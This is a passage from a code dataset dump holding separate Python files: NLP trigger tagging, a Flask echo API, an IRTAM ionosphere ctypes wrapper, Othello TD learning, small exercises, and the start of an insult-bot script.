test_data = read_corpus_tr_id(config.tri_id_test_file, max_length=config.max_length, label_dic=label_dic, vocab=vocab)\r\n test_ids = torch.LongTensor([temp[0] for temp in test_data])\r\n test_masks = torch.LongTensor([temp[1] for temp in test_data])\r\n test_tags = torch.LongTensor([temp[2] for temp in test_data])\r\n test_dataset = TensorDataset(test_ids, test_masks, test_tags)\r\n test_loader = DataLoader(test_dataset, shuffle=False, batch_size=config.batch_size)\r\n # load trained model\r\n if not model:\r\n model = BertLstmCrf(config.bert_path, tagset_size, config.bert_embedding, config.rnn_hidden, config.rnn_layer, dropout_ratio=config.dropout_ratio, dropout1=config.dropout1, use_cuda=config.use_cuda)\r\n model = load_model(model, name=config.load_path)\r\n if config.use_cuda:\r\n model.cuda()\r\n # evaluate model in test file\r\n print('begin predicting')\r\n evaluate(model, test_loader, 0, config, True)\r\n\r\n\r\ndef predict(config=None, model=None, sent=None):\r\n \"\"\"\r\n Input: raw sentences saved in config.input_file or sent\r\n Output: results of trigger identification saved in config.tri_id_result_file\r\n format: sentence ||| tag (BIO)\r\n \"\"\"\r\n # load config\r\n if not config:\r\n config = Config()\r\n\r\n vocab = load_vocab(config.vocab)\r\n label_dic = load_vocab(config.tri_id_label_file)\r\n tagset_size = len(label_dic)\r\n # load trained model\r\n if not model:\r\n model = BertLstmCrf(config.bert_path, tagset_size, config.bert_embedding, config.rnn_hidden, config.rnn_layer,\r\n dropout_ratio=config.dropout_ratio, dropout1=config.dropout1, use_cuda=config.use_cuda)\r\n model = load_model(model, name=config.load_path)\r\n if config.use_cuda:\r\n model.cuda()\r\n # begin predicting\r\n if (not config.input_file) and sent:\r\n # preprocess sent\r\n sent = sent.lower()\r\n tokens = sent.split()\r\n tokens = tokens[0:min(config.max_length-2, len(tokens))]\r\n tokens_f = ['[CLS]'] + tokens + ['[SEP]']\r\n input_ids = torch.LongTensor([[int(vocab[i]) if i in vocab else int(vocab['[UNK]']) for i in tokens_f]])\r\n input_masks = torch.LongTensor([[1] * len(input_ids[0])])\r\n if config.use_cuda and torch.cuda.is_available():\r\n input_ids, input_masks = input_ids.cuda(), input_masks.cuda()\r\n # predict tags\r\n with torch.no_grad():\r\n feats = model(input_ids, input_masks)\r\n path_score, best_path = model.crf(feats, input_masks)\r\n pred_label = best_path[0].cpu().numpy().tolist()\r\n pred_label = [list(label_dic.keys())[int(x)] for x in pred_label[1:-1]]\r\n return pred_label\r\n else:\r\n with open(config.input_file, 'r', encoding='utf-8') as f:\r\n sents = f.readlines()\r\n data = []\r\n for line in sents:\r\n line = line.lower()\r\n tokens = line.split()\r\n tokens = tokens[0:min(config.max_length - 2, len(tokens))]\r\n tokens_f = ['[CLS]'] + tokens + ['[SEP]']\r\n input_ids = [int(vocab[i]) if i in vocab else int(vocab['[UNK]']) for i in tokens_f]\r\n input_masks = [1] * len(input_ids)\r\n while len(input_ids) < config.max_length:\r\n input_ids.append(0)\r\n input_masks.append(0)\r\n data.append((input_ids, input_masks))\r\n ids = torch.LongTensor([temp[0] for temp in data])\r\n masks = torch.LongTensor([temp[1] for temp in data])\r\n dataset = TensorDataset(ids, masks)\r\n loader = DataLoader(dataset, shuffle=False, batch_size=config.batch_size)\r\n sents = []\r\n pred = []\r\n for i, batch in tqdm.tqdm(enumerate(loader)):\r\n inputs, masks = batch\r\n inputs, masks = Variable(inputs), Variable(masks)\r\n masks = masks.bool()\r\n\r\n # save sentences\r\n for idx in range(inputs.shape[0]):\r\n sents.append(inputs[idx][masks[idx]].cpu().numpy().tolist())\r\n\r\n # predict labels\r\n if config.use_cuda:\r\n inputs, masks = inputs.cuda(), masks.cuda()\r\n with torch.no_grad():\r\n feats = model(inputs, masks)\r\n path_score, best_path = model.crf(feats, masks.byte())\r\n\r\n # save labels\r\n for idx in range(inputs.shape[0]):\r\n pred.append(best_path[idx][masks[idx]].cpu().numpy().tolist())\r\n # save result\r\n save_results(sents, pred, config)\r\n return pred\r\n\r\n\r\ndef evaluate(model, data_loader, epoch, config, save_result=False):\r\n model.eval()\r\n eval_loss = 0\r\n true = [] # true labels\r\n pred = [] # predicted labels\r\n sents = [] # sentences\r\n length = 0\r\n for i, batch in tqdm.tqdm(enumerate(data_loader)):\r\n inputs, masks, tags = batch\r\n length += inputs.size(0)\r\n inputs, masks, tags = Variable(inputs), Variable(masks), Variable(tags)\r\n masks = masks.bool()\r\n\r\n # save sentences\r\n for idx in range(inputs.shape[0]):\r\n sents.append(inputs[idx][masks[idx]].cpu().numpy().tolist())\r\n\r\n if config.use_cuda:\r\n inputs, masks, tags = inputs.cuda(), masks.cuda(), tags.cuda()\r\n feats = model(inputs, masks)\r\n path_score, best_path = model.crf(feats, masks.byte())\r\n loss = model.loss(feats, masks, tags)\r\n eval_loss += loss.item()\r\n\r\n # save labels\r\n for idx in range(inputs.shape[0]):\r\n pred.append(best_path[idx][masks[idx]].cpu().numpy().tolist())\r\n true.append(tags[idx][masks[idx]].cpu().numpy().tolist())\r\n # evaluate model's performace in data loader\r\n label_dic = load_vocab(config.tri_id_label_file)\r\n label_dic = dict(zip(label_dic.values(), label_dic.keys()))\r\n gold_num, predict_num, correct_num = 0, 0, 0\r\n for idx, tag in enumerate(pred):\r\n pred_tag = [label_dic[int(x)] for x in pred[idx]]\r\n true_tag = [label_dic[int(x)] for x in true[idx]]\r\n new_gold_num, new_predict_num, new_correct_num = evaluate_sent(true_tag, pred_tag)\r\n gold_num += new_gold_num\r\n predict_num += new_predict_num\r\n correct_num += new_correct_num\r\n precision = correct_num / predict_num if predict_num else 0\r\n recall = correct_num / gold_num if gold_num else 0\r\n f_score = (2 * precision * recall) / (precision + recall) if precision + recall else 0\r\n print('Gold Num: ', gold_num, ' Pred Num: ', predict_num, ' Corr Num: ', correct_num)\r\n print('Precision: ', precision, ' Recall: ', recall, ' F-score: ', f_score)\r\n # save result\r\n if save_result:\r\n save_results(sents, pred, config)\r\n # return loss\r\n print('eval epoch: {}| loss: {}'.format(epoch, eval_loss/length))\r\n model.train()\r\n return eval_loss\r\n\r\n\r\ndef save_results(sents, pred, config, path=None):\r\n vocab = []\r\n label_dic = load_vocab(config.tri_id_label_file)\r\n label_dic = dict(zip(label_dic.values(), label_dic.keys()))\r\n with open(config.vocab, \"r\", encoding=\"utf-8\") as reader:\r\n while True:\r\n token = reader.readline()\r\n if not token:\r\n break\r\n token = token.strip()\r\n vocab.append(token)\r\n if not path:\r\n path = config.tri_id_result_file\r\n with open(path, 'w', encoding='utf-8') as f:\r\n readable_sents = []\r\n readable_preds = []\r\n for idx in range(len(sents)):\r\n readable_sents.append([vocab[w] for w in sents[idx][1:-1]])\r\n readable_preds.append([label_dic[int(x)] for x in pred[idx][1:-1]])\r\n for idx in range(len(readable_sents)):\r\n f.write(' '.join(readable_sents[idx]))\r\n f.write('|||')\r\n f.write(' '.join(readable_preds[idx]))\r\n f.write('\\n')\r\n\r\n\r\ndef evaluate_sent(true_tag, predict_tag):\r\n gold_num = 0\r\n predict_num = 0\r\n correct_num = 0\r\n sent_len = len(true_tag)\r\n start_flag = False\r\n equal_flag = True\r\n\r\n for i in range(sent_len):\r\n gold_num = gold_num + 1 if 'B' in true_tag[i] else gold_num\r\n predict_num = predict_num + 1 if 'B' in predict_tag[i] else predict_num\r\n if 'B' in true_tag[i]:\r\n start_flag = True\r\n if start_flag and true_tag[i] != predict_tag[i]:\r\n equal_flag = False\r\n if start_flag and ((i < sent_len - 1 and 'I' not in true_tag[i+1]) or i == sent_len - 1):\r\n start_flag = False\r\n if equal_flag and ((i < sent_len - 1 and 'I' not in predict_tag[i+1]) or i == sent_len - 1):\r\n correct_num += 1\r\n equal_flag = True\r\n return gold_num, predict_num, correct_num\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--do-train', type=bool, default=False,\r\n help='Whether to retrain the model.')\r\n parser.add_argument('--do-eval', type=bool, default=False,\r\n help='Whether to perform evaluation.')\r\n args = parser.parse_args()\r\n if args.do_train:\r\n train()\r\n if args.do_eval:\r\n test()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"web/utils/tri_id.py","file_name":"tri_id.py","file_ext":"py","file_size_in_byte":12737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"153785691","text":"from question1 import Array\nfrom timeit import Timer\nfrom memory_profiler import profile\n\n#The beginning of Qn2\nclass SubArray(Array):\n @profile\n def add(self, values):\n print(\"***QUESTION 2***\")\n values.append(34)\n print(\"WE HAVE ADDED 34 IN THE ARRAY: \" , values)\n\n @profile\n def delete(self, values):\n values.remove(9)\n print(\"9 WAS REMOVED FROM THE ARRAY. THE NEW ARRAY IS: \" , values)\n print(\"\")\n\n# Third Question\n #Check if a value is in an array\n @profile\n def check(self, values):\n print(\"***QUESTION 3***\")\n if 5 in values:\n contains = True\n print(contains)\n else:\n print(\"none\")\n\n #Reversing an array\n @profile\n def reverse(self,values):\n print(\"THE REVERSE IS: \")\n for i in reversed(values):\n print(i)\n\n # Adding an item to a specific location\n @profile\n def insertion(self, values):\n values.insert(3, 76)\n print(values)\n print(\"\")\n\nif __name__=='__main__':\n t = Timer(\"SubArray\", \"from __main__ import SubArray\")\n print(\"This is the Runtime for this program: \" , t.timeit())\n","sub_path":"question2_3.py","file_name":"question2_3.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532292432","text":"import csv\r\nimport pandas as pd\r\npath_no_backedge=pd.DataFrame(pd.read_csv('finished-paths-back.csv'))\r\n\r\ndata_file = open('percentage-paths-back.csv', 'w+',newline='',encoding='utf-8')\r\ncsv_writer = csv.writer(data_file)\r\nheader=['Equal_Length','Larger_by_1','Larger_by_2','Larger_by_3','Larger_by_4','Larger_by_5','Larger_by_6'\r\n ,'Larger_by_7','Larger_by_8','Larger_by_9','Larger_by_10','Larger_by_more_than_10']\r\ncsv_writer.writerow([header[0],header[1],header[2],header[3],header[4],header[5],header[6],header[7],header[8],header[9],header[10],header[11]])\r\n\r\ntotal_count=0\r\ncount_same=0\r\ncount_remaining=[0,0,0,0,0,0,0,0,0,0,0]\r\n#print(path_no_backedge.iloc[0]['human path length'])\r\n\r\nfor i in range(len(path_no_backedge)):\r\n if path_no_backedge.iloc[i]['Shortest_Path_Length']=='NA':\r\n continue\r\n diff=int(path_no_backedge.iloc[i]['Human_Path_Length'])-int(path_no_backedge.iloc[i]['Shortest_Path_Length'])\r\n total_count+=1\r\n if diff==0:\r\n count_same+=1\r\n elif diff >=1 and diff <=10:\r\n count_remaining[diff-1]+=1\r\n else:\r\n count_remaining[10]+=1\r\ncsv_writer.writerow([round((count_same/total_count)*100,2),round((count_remaining[0]/total_count)*100,2),round((count_remaining[1]/total_count)*100,2),\r\n round((count_remaining[2] / total_count) * 100, 2),round((count_remaining[3]/total_count)*100,2),round((count_remaining[4]/total_count)*100,2),\r\n round((count_remaining[5]/total_count)*100,2),round((count_remaining[6]/total_count)*100,2),round((count_remaining[7]/total_count)*100,2),\r\n round((count_remaining[8]/total_count)*100,2),round((count_remaining[9]/total_count)*100,2),round((count_remaining[10]/total_count)*100,2)\r\n ])\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"percentage-paths-back.py","file_name":"percentage-paths-back.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"99254404","text":"# -*- coding: utf-8 -*-\n\nfrom jsresource import JSResource\n\nDEFAULT_LANGUAGE = 'en'\n\nfile_strings = JSResource(\n 'files/',\n fallback_dictionary = DEFAULT_LANGUAGE\n)\n\nwforms = JSResource(\n 'wforms/',\n fallback_dictionary = DEFAULT_LANGUAGE\n)\n\nfallback_strings_1 = JSResource(\n 'fallback_strings_1/',\n fallback_dictionary = DEFAULT_LANGUAGE\n)\n\nfallback_strings_2 = JSResource(\n 'fallback_strings_2/',\n fallback_dictionary = DEFAULT_LANGUAGE\n)\n\nstrings = JSResource(\n 'strings/',\n fallback_dictionary = DEFAULT_LANGUAGE,\n fallback_resources = [wforms, fallback_strings_1, fallback_strings_2]\n)\n\nfor language in 'en', 'ru':\n print('\\nfor', language, 'file:')\n\n print(file_strings[language]('html.index'))\n print(file_strings[language]('html.templates.first_template'))\n print(file_strings[language]('html.templates.second_template'))\n\n # directly defined strings reedifine nested strings\n print(file_strings[language]('image.1'))\n print(file_strings[language]('image.2'))\n print(file_strings[language]('image.3'))\n\n print(strings[language]('messages.hero.i_found_n_items', message_from = 'First hero', n = 12, hero_sex = 'm'))\n print(strings[language]('messages.hero.i_found_n_items', message_from = 'Second hero', n = 21, hero_sex = 'f'))\n print(strings[language]('messages.hero.i_found_n_items', message_from = 'Third hero', n = 1, hero_sex = 'n'))\n\n print(strings[language]('fallback_string_1'))\n print(strings[language]('fallback_string_2'))\n\n # resolve (sub)dictionary to json string\n print(strings[language].resolve_json('interface'))\n print(file_strings[language].resolve_json(''))\n","sub_path":"example/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"556203848","text":"from flask import jsonify, request\n\ndef echo_get():\n name = request.args.get('name', '').strip()\n msg = {\"msg\": \"Hello \" + name} if name else {\"msg\": \"Hello\"}\n return jsonify(msg)\n\ndef echo_post():\n if 'name' in request.form:\n name = request.form['name']\n else:\n name = ''\n msg = {\"msg\": \"Hello \" + name} if name else {\"msg\": \"Hello\"}\n return jsonify(msg)\n","sub_path":"REST/swagger_tutorial_2/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"504571515","text":"# Copyright (C) 2017 Boston College\n# http://www.bostoncollege.edu\n#\n# BC Proprietary Information\n#\n# US Government retains Unlimited Rights\n# Non-Government Users – restricted usage as defined through\n# licensing with STR or via arrangement with Government.\n#\n# In no event shall the initial developers or copyright holders be\n# liable for any damages whatsoever, including - but not restricted\n# to - lost revenue or profits or other direct, indirect, special,\n# incidental or consequential damages, even if they have been\n# advised of the possibility of such damages, except to the extent\n# invariable law, if any, provides otherwise.\n#\n# The Software is provided AS IS with NO\n# WARRANTY OF ANY KIND, INCLUDING THE WARRANTY OF DESIGN,\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.\n\nimport platform\nimport unittest\nimport numpy\nimport collections\nimport os\nimport ctypes as C\nfrom ctypes import cdll\nimport Shared.Utils.HfgeoLogger as Logger\n\nlogger = Logger.getLogger()\n\n## @package IonoModelEngine\n# Python interface to FOUT1\n\n## The interface class to IrtamPyIface\n# Contains an instance of the C interface library\n#\nclass IrtamPyIface:\n\n ## Constructor sets up all the handle\n #\n def __init__(self):\n\n # Figure out which os this is on so that we can load the correct library\n #\n libName = os.path.join(os.path.dirname(os.path.realpath(__file__)),'lib')\n if platform.system() == 'Darwin':\n libName = os.path.join(libName,'libirtampy_mac.dylib')\n elif platform.system() == 'Linux':\n libName = os.path.join(libName,'libirtampy_lin.so')\n \n self.libhandle = cdll.LoadLibrary( libName )\n self.libhandle.processirtam.argtypes = C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double)\n \n self.irtamInput = collections.namedtuple('processirtam_input', \\\n 'alati, along, xmodip, hourut, tov, param, param_local')\n\n def __del__(self):\n import _ctypes\n logger.warning('IrtamPyIface Destructor')\n _ctypes.dlclose(self.libhandle._handle)\n\n ## Return a named tuple object that represent the input to sao reader.\n # For example: \n # param_local, irtam_tov = processirtam(irtamInput)\n # \n # @retval irtamInput A named tuple that the user need to fill in and pass to procesirtam()\n #\n def getIrtamInput(self):\n return self.irtamInput\n\n ## Call processirtam in the lib \n #\n # @param irtamInput - The named tuple input to getprofile\n #\n # @retval param_local, irtam_tov - IRTAM coefficients and Time of Validity\n # \n def processirtam(self, irtamInput):\n\n # Convert from python type to c type\n #\n alati = C.byref(C.c_double(irtamInput.alati))\n along = C.byref(C.c_double(irtamInput.along))\n xmodip = C.byref(C.c_double(irtamInput.xmodip))\n hourut = C.byref(C.c_double(irtamInput.hourut))\n tov = C.byref(C.c_double(irtamInput.tov))\n param = irtamInput.param.ctypes.data_as(C.POINTER(C.c_double))\n param_local = C.c_double(irtamInput.param_local) \n\n # Calling the C interface\n #\n self.libhandle.processirtam(alati, \\\n along, \\\n xmodip, \\\n hourut, \\\n tov, \\\n param,\\\n param_local)\n \n return param_local.value\n\nclass UnitTest_IrtamPyIface(unittest.TestCase):\n\n def test_irtam(self):\n\n iface = IrtamPyIface()\n\n\t # Get the Input object so we can fill it out\n\t #\n irtamInput = iface.getIrtamInput()\n irtamInput.alati = 32.42\n irtamInput.along = 253.71\n irtamInput.xmodip = 25.0\n irtamInput.hourut = 12.\n irtamInput.tov = 12.\n irtamInput.param = numpy.zeros(1064)\n logger.info(irtamInput.param[0:10])\n\n irtamfile = os.path.dirname(os.path.abspath(__file__)) + '/test_data/IRTAM_hmF2_COEFFS_20140119_1545.ASC' \n data = numpy.genfromtxt(irtamfile)\n irtamInput.param = numpy.reshape(data,1064)\n logger.info(irtamInput.param[0:10])\n irtamInput.param_local = numpy.zeros(1)\n (param_local) = iface.processirtam(irtamInput)\n logger.info(param_local)\n\nif __name__ == \"__main__\":\n logger.setLevel('INFO')\n unittest.main()\n \n\n\n\n\n\n\n\n\n","sub_path":"call-04/Send_RIPE/IonoModelEngine/IRTAM/IrtamPyIface.py","file_name":"IrtamPyIface.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"257905470","text":"\n\n\"\"\"----------------------------------------------------------------------------\nMODULE\n FSuggestPriceTemplate - Module that handles the suggested price for \n the underlying instrument when trading Repo/Reverse and SecurityLoan. \n The suggested price is the market dirty price rounded to 2 decimals. \n\n (c) Copyright 2011 by SunGard FRONT ARENA. All rights reserved.\n\nRENAME this module to FSuggestPrice.\n\n----------------------------------------------------------------------------\"\"\"\nimport ael\nimport acm\n\ndef suggest_undprice(trade):\n\n if not trade.insaddr:\n print ('No instrument found')\n return 0\n \n if not trade.insaddr.und_insaddr:\n print ('No underlying instrument found')\n return 0\n\n context = acm.GetDefaultContext()\n sheet_type = 'FDealSheet'\n calc_space = acm.Calculations().CreateCalculationSpace( context, sheet_type) \n\n marketPrice_ColumnId = 'Instrument Market Price'\n marketPriceDirty_ColumnId = 'Instrument Market Price Dirty'\n fromQ_ColumnId = 'Standard Calculations From Quote'\n theorPrice_ColumnId = 'Standard Calculations Price Theor'\n fromQtn_ColumnId = 'Standard Calculations From Quotation'\n quote_ColumnId = 'Standard Calculations Quote To Quote'\n quoteDay_ColumnId = 'Standard Calculations From Quote Value Date'\n \n trd = acm.FTrade[trade.trdnbr]\n undIns = acm.FInstrument[trade.insaddr.und_insaddr.insid]\n round = acm.GetFunction('round', 3)\n\n if trade.insaddr.instype == 'BuySellback':\n price = calc_space.CreateCalculation( undIns, marketPrice_ColumnId ).Value().Number()\n if not acm.Math.IsFinite( price ):\n price = calc_space.CreateCalculation( undIns, theorPrice_ColumnId ).Value().Number()\n price = round(price, 2, 'Normal')\n else: \n price = calc_space.CreateCalculation( undIns, marketPriceDirty_ColumnId ).Value().Number()\n if not acm.Math.IsFinite( price ):\n price = calc_space.CreateCalculation( undIns, theorPrice_ColumnId ).Value().Number()\n calc_space.SimulateValue( undIns, marketPrice_ColumnId, price )\n price = calc_space.CreateCalculation( undIns, marketPriceDirty_ColumnId ).Value().Number()\n calc_space.RemoveSimulation( undIns, marketPrice_ColumnId )\n\n price = round(price, 2, 'Normal') \n calc_space.SimulateValue( undIns, fromQ_ColumnId, price )\n calc_space.SimulateValue( undIns, fromQtn_ColumnId, 'Pct of Nominal') \n day = trd.ValueDay()\n calc_space.SimulateValue( undIns, quoteDay_ColumnId, day ) \n price = calc_space.CreateCalculation( undIns, quote_ColumnId ).Value().Number() \n calc_space.RemoveSimulation( undIns, fromQ_ColumnId )\n calc_space.RemoveSimulation( undIns, fromQtn_ColumnId )\n calc_space.RemoveSimulation( undIns, quoteDay_ColumnId )\n\n return price\n\n","sub_path":"Extensions/REMod/FPythonCode/FSuggestPriceTemplate.py","file_name":"FSuggestPriceTemplate.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"89651377","text":"# lib of temporal difference learning for othello\r\nimport ModifiedBench.Function as Function\r\nimport ModifiedBench.Comparator as Comparator\r\nimport ModifiedBench.pso as pso\r\nimport math\r\nimport random\r\nimport numpy as np\r\nimport copy\r\nimport Problem\r\nimport matplotlib.pyplot as plt\r\nimport Othello\r\n\r\nnpop = 10\r\nps = 100\r\npn = \"othello\"\r\n\r\n\r\ndef cprint(cond,text):\r\n if cond:\r\n print(text)\r\n\r\ndef tdl_othello():\r\n max_games = 1e6\r\n games = 0\r\n # strategy representation-WPC\r\n othello = Problem.Problem()\r\n othello.instantiate(pn)\r\n player = Othello.Player()\r\n player.initialize_weight(othello.xlb,othello.xub) # strategy weight matrix\r\n print(player.w)\r\n # while games < max_games:\r\n pass\r\n\r\n\r\n\r\ndef test_selfplay(weight):\r\n # self-play othello\r\n othello = Problem.Problem()\r\n othello.instantiate(pn)\r\n state = Othello.State()\r\n state.is_end()\r\n player = Othello.Player()\r\n player.w = copy.deepcopy(weight) # strategy weight matrix\r\n while not state.end:\r\n # self-play begins\r\n print(\"round\",state.round,\"turn\", state.turn)\r\n skip, state = player.act(state, update_strategy=False) # black player moves, symbol = 1\r\n state.turn = - state.turn # switch to white player strategy\r\n player.symbol = state.turn\r\n print(\"round\", state.round, \"turn\", state.turn)\r\n skip, state = player.act(state, update_strategy=False) # white player moves, symbol = -1\r\n state.turn = - state.turn # switch to black player strategy\r\n player.symbol = state.turn\r\n state.round += 1\r\n if state.end:\r\n if state.winner == 1:\r\n print(\"Black wins.\")\r\n elif state.winner == -1:\r\n print(\"White wins.\")\r\n else:\r\n print(\"End with a draw\")\r\n\r\n\r\ndef test_tdl(verbose=0):\r\n max_games = 3e6\r\n games = 0\r\n best_players = []\r\n # strategy representation-WPC\r\n othello = Problem.Problem()\r\n othello.instantiate(pn)\r\n player = Othello.Player()\r\n player.initialize_weight(othello.xlb, othello.xub) # strategy weight matrix\r\n # training process\r\n while games < max_games:\r\n if games % (max_games / 20) == 0:\r\n best_players.append(copy.deepcopy(player))\r\n print(\"game\",games)\r\n state = Othello.State()\r\n state.is_end()\r\n while not state.end:\r\n # self-play begins\r\n cprint(verbose == 1, \"round \"+str(state.round)+\" turn \"+str(state.turn))\r\n skip, state = player.act(state, display=False) # black player moves, symbol = 1\r\n state.turn = - state.turn # switch to white player strategy\r\n player.symbol = state.turn\r\n cprint(verbose == 1, \"round \"+str(state.round)+\" turn \"+str(state.turn))\r\n skip, state = player.act(state, display=False) # white player moves, symbol = -1\r\n state.turn = - state.turn # switch to black player strategy\r\n player.symbol = state.turn\r\n state.round += 1\r\n # print(np.round(player.w,2))\r\n if state.end and verbose == 1:\r\n if state.winner == 1:\r\n print(\"Black wins.\")\r\n elif state.winner == -1:\r\n print(\"White wins.\")\r\n elif state.winner == 0:\r\n print(\"End with a draw\")\r\n else:\r\n print(\"Invalid winner!\")\r\n games += 1\r\n print(\"Training is over.\")\r\n print(\"Saving the strategy.\")\r\n np.save(\"./Data/weight_mat/tdl_weight.npy\", player.w)\r\n\r\n\r\nif __name__ == '__main__':\r\n # test_tdl()\r\n data = np.load(\"./Data/opt_process/s0.npy\")\r\n player = Othello.Player()\r\n player.load_weight(data)\r\n print(np.round(player.w, 2))\r\n # test_vs_random_opponents([player],oppo_size=1)\r\n Othello.test_vs_fixed_opponent(player, Othello.hp)\r\n","sub_path":"TDL.py","file_name":"TDL.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238636773","text":"# Definition for an interval.\nclass Interval:\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass Solution:\n\n def union(self, interval_a, interval_b):\n return Interval(interval_a.start, max(interval_a.end, interval_b.end))\n\n def is_intersected(self, interval_a, interval_b):\n if interval_a.start <= interval_b.start <= interval_a.end:\n return True\n else:\n return False\n\n def insert(self, intervals, newInterval):\n intervals.append(newInterval)\n intervals = sorted(intervals, key=lambda x: (x.start, -x.end))\n result = []\n tmp_interval = None\n for interval in intervals:\n if tmp_interval is None:\n tmp_interval = Interval(interval.start, interval.end)\n continue\n if self.is_intersected(tmp_interval, interval):\n tmp_interval = self.union(tmp_interval, interval)\n else:\n result.append(Interval(tmp_interval.start, tmp_interval.end))\n tmp_interval = Interval(interval.start, interval.end)\n if tmp_interval:\n result.append(tmp_interval)\n return result\n","sub_path":"51-100/57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264359490","text":"#AWS_Restart\n#Ghanaian Names Days Of The Week\n#Daniel Nii Amu Dodoo\n\n#Populating the days of the week in an array\n\ndaysOfWeek = []\n\nprefixes = ['first', 'second', 'third', 'fourth', 'fifth', 'sixth', 'seventh']\n\nwhile len(daysOfWeek) < 7:\n for prefix in prefixes:\n day = input('Enter the ' + prefix + \" day of the week:\")\n daysOfWeek.append(day.capitalize())\n print(daysOfWeek)\n\n if daysOfWeek.count(day) > 1:\n daysOfWeek.pop()\n day = input ('Enter the' + prefix + \" day of the week again:\")\n daysOfWeek.append(day.capitalize())\n print(daysOfWeek)\n\n \n#User inputs sex and day born\nsex_Male_Female = input(\"Enter Your Sex, Male or Female:\")\nday_Born = input(\"Enter the day of the week you were born:\")\n\n\n#Compares users inputs to days \nif sex_Male_Female == \"Male\" and day_Born == \"Monday\":\n print(\"Kwadwo\")\nelif sex_Male_Female == \"Female\" and day_Born == \"Monday\":\n print(\"Ajua\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Tuesday\":\n print(\"Kwabena\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Tuesday\":\n print(\"Abena\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Wednesday\":\n print(\"Kwaku\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Wednesday\":\n print(\"Akua\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Thursday\":\n print(\"Yaw\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Thursday\":\n print(\"Yaa\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Friday\":\n print(\"Kofi\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Friday\":\n print(\"Afia\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Saturday\":\n print(\"Kwame\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Saturday\":\n print(\"Ama\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Sunday\":\n print(\"Kwesi\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Sunday\":\n print(\"Esi\")\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Loops_Daniel_Updated.py","file_name":"Loops_Daniel_Updated.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"21764221","text":"from flask import Flask\nfrom flask import json\nfrom flask import jsonify\nfrom flask import request\nimport os\nimport random\nimport hipchat_client\n\nINSULTS = [\n \"Is your ass jealous of the amount of shit that just came out of your mouth?\",\n \"I bet your brain feels as good as new, seeing that you never use it.\",\n \"I'd like to see things from your point of view but I can't seem to get my head that far up my ass.\",\n \"I could eat a bowl of alphabet soup and shit out a smarter statement than that.\",\n \"If I wanted to kill myself I'd climb your ego and jump to your IQ.\",\n \"If you're gonna be a smartass, first you have to be smart. Otherwise you're just an ass.\",\n \"It's better to let someone think you are an Idiot than to open your mouth and prove it.\",\n \"I have neither the time nor the crayons to explain this to you.\",\n \"Why don't you slip into something more comfortable -- like a coma.\",\n \"I may love to shop but I'm not buying your bullshit.\",\n \"Well I could agree with you, but then we'd both be wrong.\",\n \"You're the reason the gene pool needs a lifeguard.\",\n \"You have two brains cells, one is lost and the other is out looking for it.\",\n \"If I gave you a penny for your thoughts, I'd get change.\",\n \"You're as bright as a black hole, and twice as dense.\",\n \"If you spoke your mind, you'd be speechless.\",\n \"Shock me, say something intelligent.\",\n \"So you've changed your mind, does this one work any better?\",\n \"If your brain was made of chocolate, it wouldn't fill an M&M.\",\n \"I can explain it to you, but I can't understand it for you.\",\n \"You are proof that evolution CAN go in reverse.\",\n \"You do realize makeup isn't going to fix your stupidity?\",\n \"Some drink from the fountain of knowledge; you only gargled.\",\n \"It's kinda sad watching you attempt to fit your entire vocabulary into a sentence.\",\n \"You're a person of rare intelligence. It's rare when you show any.\",\n \"I thought you were attractive, but then you opened your mouth.\",\n 'You stare at frozen juice cans because they say, \"concentrate\".',\n \"You're so stupid you tried to wake a sleeping bag.\",\n \"I don't know what makes you so stupid, but it really works!\",\n \"Aww, it's so cute when you try to talk about things you don't understand.\",\n \"Am I getting smart with you? How would you know?\",\n \"I'm not saying I hate you, but I would unplug your life support to charge my phone.\",\n \"You must have been born on a highway because that's where most accidents happen.\",\n \"You bring everyone a lot of joy, when you leave the room.\",\n \"You shouldn't play hide and seek, no one would look for you.\",\n \"I have neither the time nor the 